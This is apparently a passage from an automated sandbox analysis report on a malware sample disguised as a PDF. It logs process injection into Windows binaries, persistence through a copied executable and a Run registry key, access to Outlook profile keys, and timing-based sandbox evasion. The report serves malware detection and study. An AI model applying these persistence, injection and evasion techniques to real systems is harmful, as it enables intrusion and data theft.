Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\SysWOW64\ipconfig.exe File written: C:\Users\user\AppData\Roaming\J8AR3449\J8Alogri.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: 101 2043 5770 pdf.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: 101 2043 5770 pdf.exe Static file information: File size 2148960 > 1048576
Source: 101 2043 5770 pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 101 2043 5770 pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 101 2043 5770 pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 101 2043 5770 pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 101 2043 5770 pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 101 2043 5770 pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 101 2043 5770 pdf.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 101 2043 5770 pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ipconfig.pdb source: csc.exe, 00000006.00000002.2188747951.00000000054D8000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2188945268.0000000005830000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4584574115.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: firefox.pdbP source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ipconfig.pdbGCTL source: csc.exe, 00000006.00000002.2188747951.00000000054D8000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2188945268.0000000005830000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4584574115.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: cmmon32.pdb source: cmmon32.exe, 00000018.00000002.2315834877.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: cmmon32.exe, 00000018.00000002.2315834877.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: csc.exe, 00000006.00000003.2122937679.00000000055DD000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.2125210972.000000000578A000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.0000000003590000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2188668887.000000000322F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2190345927.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.000000000372E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2307893156.000000000493D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2305627379.000000000478D000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.000000000382E000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2336815849.000000000333B000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.0000000003690000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2339364958.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2474713451.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2476433854.0000000004A85000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000006.00000003.2122937679.00000000055DD000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.2125210972.000000000578A000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4592690985.0000000003590000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2188668887.000000000322F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2190345927.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.000000000372E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2307893156.000000000493D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2305627379.000000000478D000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.000000000382E000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2336815849.000000000333B000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.0000000003690000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2339364958.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2474713451.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2476433854.0000000004A85000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RAServer.pdb source: wmplayer.exe, 0000001F.00000002.2476009555.0000000005770000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474668893.0000000003167000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2477735165.0000000000240000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RAServer.pdbGCTL source: wmplayer.exe, 0000001F.00000002.2476009555.0000000005770000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474668893.0000000003167000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2477735165.0000000000240000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: firefox.pdb source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: csc.pdb source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: csc.pdbF source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source: 101 2043 5770 pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 101 2043 5770 pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 101 2043 5770 pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 101 2043 5770 pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 101 2043 5770 pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: 101 2043 5770 pdf.exe Static PE information: section name: .managed
Source: 101 2043 5770 pdf.exe Static PE information: section name: hydrated
Source: 101 2043 5770 pdf.exe.0.dr Static PE information: section name: .managed
Source: 101 2043 5770 pdf.exe.0.dr Static PE information: section name: hydrated
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 0_2_00007FF7D7872177 push rbx; iretd 0_2_00007FF7D787217A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_00417948 push esi; retf 6_2_00417954
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0041D4E2 push eax; ret 6_2_0041D4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0041D4EB push eax; ret 6_2_0041D552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0041D495 push eax; ret 6_2_0041D4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0041D54C push eax; ret 6_2_0041D552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0041665C pushad ; iretd 6_2_0041665D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0041C6E2 push edi; retf 6_2_0041C6EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0040C6B8 push FFFFFFA4h; ret 6_2_0040C6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059609AD push ecx; mov dword ptr [esp], ecx 6_2_059609B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05890FB8 push eax; retf 6_2_05890FC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0588E9B5 push esp; retn 0000h 6_2_0588EAE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0588EB02 push esp; retn 0000h 6_2_0588EB03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0588EB1E push esp; retn 0000h 6_2_0588EB1F
Source: C:\Windows\explorer.exe Code function: 7_2_101759B5 push esp; retn 0000h 7_2_10175AE7
Source: C:\Windows\explorer.exe Code function: 7_2_10175B1E push esp; retn 0000h 7_2_10175B1F
Source: C:\Windows\explorer.exe Code function: 7_2_10175B02 push esp; retn 0000h 7_2_10175B03
Source: C:\Windows\explorer.exe Code function: 7_2_10177FB8 push eax; retf 7_2_10177FC7
Source: C:\Windows\explorer.exe Code function: 7_2_106EF9B5 push esp; retn 0000h 7_2_106EFAE7
Source: C:\Windows\explorer.exe Code function: 7_2_106EFB02 push esp; retn 0000h 7_2_106EFB03
Source: C:\Windows\explorer.exe Code function: 7_2_106EFB1E push esp; retn 0000h 7_2_106EFB1F
Source: C:\Windows\explorer.exe Code function: 7_2_106F1FB8 push eax; retf 7_2_106F1FC7
Source: C:\Windows\explorer.exe Code function: 7_2_1124FB02 push esp; retn 0000h 7_2_1124FB03
Source: C:\Windows\explorer.exe Code function: 7_2_1124FB1E push esp; retn 0000h 7_2_1124FB1F
Source: C:\Windows\explorer.exe Code function: 7_2_1124F9B5 push esp; retn 0000h 7_2_1124FAE7
Source: C:\Windows\explorer.exe Code function: 7_2_11251FB8 push eax; retf 7_2_11251FC7
Source: C:\Windows\explorer.exe Code function: 7_2_112F19B5 push esp; retn 0000h 7_2_112F1AE7
Source: C:\Windows\explorer.exe Code function: 7_2_112F1B02 push esp; retn 0000h 7_2_112F1B03
Source: C:\Windows\explorer.exe Code function: 7_2_112F1B1E push esp; retn 0000h 7_2_112F1B1F
Source: C:\Windows\explorer.exe Code function: 7_2_112F3FB8 push eax; retf 7_2_112F3FC7
Source: C:\Windows\explorer.exe Code function: 7_2_114519B5 push esp; retn 0000h 7_2_11451AE7

Persistence and Installation Behavior

Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe File created: C:\Users\user\101 2043 5770 pdf.exe

Boot Survival

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe File created: C:\Users\user\101 2043 5770 pdf.exe
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 101 2043 5770 pdf

Hooking and other Techniques for Hiding and Protection

Source: initial sample Icon embedded in binary file: icon matches a legit application icon: icon306.png
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\101 2043 5770 pdf.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_00DE3872 DnsGetCacheDataTableEx,DnsFree,DnsFree, 9_2_00DE3872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\ipconfig.exe API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\ipconfig.exe API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Windows\SysWOW64\ipconfig.exe API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\ipconfig.exe API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\ipconfig.exe API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\ipconfig.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\ipconfig.exe API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\ipconfig.exe API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Windows\SysWOW64\ipconfig.exe API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\ipconfig.exe API/Special instruction interceptor: Address: 7FFDB442D744
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: C49904 second address: C4990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: C49B7E second address: C49B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: C09904 second address: C0990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: C09B7E second address: C09B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe RDTSC instruction interceptor: First address: 2CC9904 second address: 2CC990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe RDTSC instruction interceptor: First address: 2CC9B7E second address: 2CC9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Memory allocated: 29D371B0000 memory reserve | memory write watch
Source: C:\Users\user\101 2043 5770 pdf.exe Memory allocated: 2653FB80000 memory reserve | memory write watch
Source: C:\Users\user\101 2043 5770 pdf.exe Memory allocated: 1EBFD450000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_00409AB0 rdtsc 6_2_00409AB0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5007
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4808
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 5190
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 4752
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 771
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 744
Source: C:\Windows\SysWOW64\ipconfig.exe Window / User API: threadDelayed 1671
Source: C:\Windows\SysWOW64\ipconfig.exe Window / User API: threadDelayed 8297
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6687
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2889
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5890
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3699
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe API coverage: 2.2 %
Source: C:\Windows\SysWOW64\ipconfig.exe API coverage: 2.3 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\explorer.exe TID: 7160 Thread sleep time: -10380000s >= -30000s
Source: C:\Windows\explorer.exe TID: 7160 Thread sleep time: -9504000s >= -30000s
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3768 Thread sleep count: 1671 > 30
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3768 Thread sleep time: -3342000s >= -30000s
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3768 Thread sleep count: 8297 > 30
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3768 Thread sleep time: -16594000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3976 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 0_2_00007FF7D7861C90 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask, 0_2_00007FF7D7861C90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
